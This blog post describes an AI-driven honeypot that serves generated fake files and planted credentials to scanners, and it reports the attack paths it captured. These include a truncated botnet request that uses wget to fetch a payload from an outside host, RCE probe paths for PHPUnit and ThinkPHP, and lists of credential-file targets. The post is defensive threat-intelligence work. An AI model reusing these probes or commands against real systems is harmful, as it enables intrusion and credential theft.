The Most Annoying Honeypot

Ben Lampere
May 11
5 min read

Most malicious scanners are looking for real vulnerabilities and leaks, so I gave them as much as they could ask for. With the help of AI, you can nearly instantly generate any data being requested. With a single ChatGPT/Claude subscription and a Digital Ocean instance, the most annoying honeypot was possible.

Back in 2023, I bought a .zip domain name when they first came out. There was a lot of buzz that these domains would be used almost exclusively for malicious activity, given the name's similarity to the popular file compression extension. That's when I set up my first honeypot.

This time I wanted to revisit the idea with two goals: to see what role AI could play in a honeypot, and to steal the enumeration wordlists that malicious users were actually using. To do that, I needed to keep them engaged as long as possible.

If you go back and read the original article, it was a small project, mostly a simple script that returned different payloads and 200 responses for whatever URL you hit. I got a handful of results: some scanning, some attack attempts, but traffic quickly died off.

Scanners and hackers today are smarter. They use automation to perform scans and attacks at scale. A blank page with a 200 response just isn't going to cut it. When an attacker is enumerating for configuration files, they want to actually see a configuration file. So why not give them exactly what they're looking for? AI turns out to be perfect for the job.

I built a honeypot that gives hackers exactly what they're after. The system is fairly simple on the surface. The first time a user hits any URL, it responds with either a 200, 500, or 403. If they're lucky, sometimes it spits out actual content. What's happening in the background is what makes it smart.

Once the server receives a URL, that path gets sent to ChatGPT with the prompt: "Return exactly what the user would be expecting if visiting this URL; return only the content, nothing else." The honeypot uses the GPT-4o API, though any model capable of generating plausible file content would work. Because AI can be slow and there's sometimes a backlog of pages to process, I don't serve the generated content on the first hit. Instead, I cache the response and serve it the next time that page is requested. The queue-based approach also kept rate limiting from becoming an issue, and over time the cache absorbed more and more of the traffic.

This method worked quite well. Watching the logs, I could see attackers first enumerating endpoints to confirm services were running, then returning to probe deeper. Convincing configuration files led to further enumeration, which helped capture more endpoints and grow the wordlist.

To drive as much traffic to the site as possible, I needed to do a little setup.

First, the server needs a real certificate, since scanners will skip sites with self-signed certificates by default. Since I was on a budget, a Let's Encrypt certificate does the job.

From there, I needed to be a little reckless on purpose. Malicious users are constantly hunting for poor security hygiene, so I needed to leave some breadcrumbs. I created a repo on my GitHub page and had Claude generate an entire fake project: README files, Docker Compose files, Makefiles, and more. The centerpiece was a configuration file containing the holy grail of leaked credentials, all pointing directly back to the honeypot.

Feel free to take a look: https://github.com/Sheepwiz/app_config

Note: all credentials in this repo are fake and point only to the honeypot.

I then posted that configuration file as irresponsibly as possible on Pastebin, Ghostbin, and whatever other sketchy alternatives I could find. I can't attribute traffic precisely to each source, but I did see a noticeable spike after the GitHub repo went live. With my fake credentials scattered across the internet, I sat back and watched the logs.

The goal was to build a wordlist from real attack traffic, so I only tracked unique requests. The script generates three files:

capture_requests.txt - the wordlist of each unique request
capture_requests_full.txt - full requests with IP address and headers for analytics
response_cache/ - every AI-generated response

So what did the data look like? The findings break down into five categories:

Thousands of Spray and Prays: The majority of attacks were broad, untargeted exploit sprays. The sheer volume makes it clear this is almost entirely automated. Any public-facing server, no matter how obscure, will be probed within hours of going live.

/hudson — Jenkins probing
/ReportServer — Microsoft reporting services
/actuator/health — Spring Boot
/adminer.php — DB admin tool
/telescope — Laravel debug panel

Credential Theft: There was massive enumeration of sensitive files: environment configs, AWS credential files, and deployment secrets. This highlights how a single exposed config file can be more damaging than a sophisticated exploit, since credentials require no technical skill to abuse.

/.env.production — environment secrets
/.git/credentials — stored Git auth
/config/aws.js — cloud config leakage
/sftp-config.json — deployment credentials
/.aws/policies — IAM policy exposure attempts

Botnet Attacks: Botnet traffic continues to saturate the internet, mostly targeting older IoT device vulnerabilities. The persistence of these attacks shows that unpatched IoT devices remain a serious and largely ignored attack surface, years after these vulnerabilities were first disclosed.

/shell?...wget http://X.XX.XXX.XX/.../kbotne7
/cgi-bin/shortcut_telnet.cgi?...kbotne7

Old and New Vulnerabilities Coexist: I saw a mix of fresh and ancient exploits side by side: the 2017 PHPUnit RCE showing up alongside a Next.js vulnerability that dropped earlier this year. The takeaway is that patching new CVEs isn't enough. Attackers are still profitably running exploits from nearly a decade ago, meaning old vulnerabilities never truly retire.

/vendor/phpunit/.../eval-stdin.php — PHPUnit RCE
/index.php?s=/index/...invokefunction — ThinkPHP RCE chain
/cgi-bin/luci/ — TP-Link router injection
/boaform/admin/formLogin — IoT/web admin brute force

Attacks from the Repo Leak: This group came directly from the endpoints I leaked via the GitHub repo. Usernames and passwords were sprayed across various endpoints in an attempt to gain access, representing a more targeted wave of traffic compared to the organic scanner noise.

/.git/HEAD - repo exposure
/graphql - GraphQL endpoint probing
/debug/default/view - debug panel access
/api/v1/auth/login - API login endpoint
/cron/backup-database - backup script

I started this project in January and pulled the data in late April. In that time, I collected 3,065 unique endpoints from 287 unique IP addresses.

There are far more advanced honeypots out there, but this was an interesting experiment in building something lightweight and cheap that still captures a meaningful picture of what's actively being scanned on the internet. If you're getting started with a homelab and curious about threat intelligence, this is a surprisingly accessible starting point.

If you want to set up this honeypot yourself, check out my GitHub below.

https://github.com/Sheepwiz/Most-Annoying-Honeypot

The steps are simple, here are a few quick steps to set this up yourself.

Pick a basic Ubuntu Linux instance on Digital Ocean
Install the following

apt update && apt upgrade -y
apt install -y python3 python3-pip openssl nodejs npm
pip3 install pyopenssl
npm install -g @openai/codex

codex auth login

Move the python scripts to the server

scp app.py root@<your-droplet-ip>:/root/honeypot/

Run the script - Replace the domain with the one you own

sudo HONEYPOT_DOMAIN=hamulus.xyz python3 app.py

No matter how small your website is, it can still be attacked. Within minutes of the website going live, I saw attacks come in. A misconfigured site can get targeted quickly if everything isn't locked down from the start. Known vulnerabilities also get scanned almost immediately once proof-of-concept code becomes publicly available. If you've never had a chance to analyze live logs, this is a great way to get started.

As a result of this project I cleaned up the wordlist and removed all the requests that contained actual payloads. I then incorporated this wordlist into my bug bounty bot as an alternative from other popular wordlist. Remember that the key to offensive security look where other people aren't and a custom wordlist give you that edge.

The Most Annoying Honeypot

Recent Posts

Comments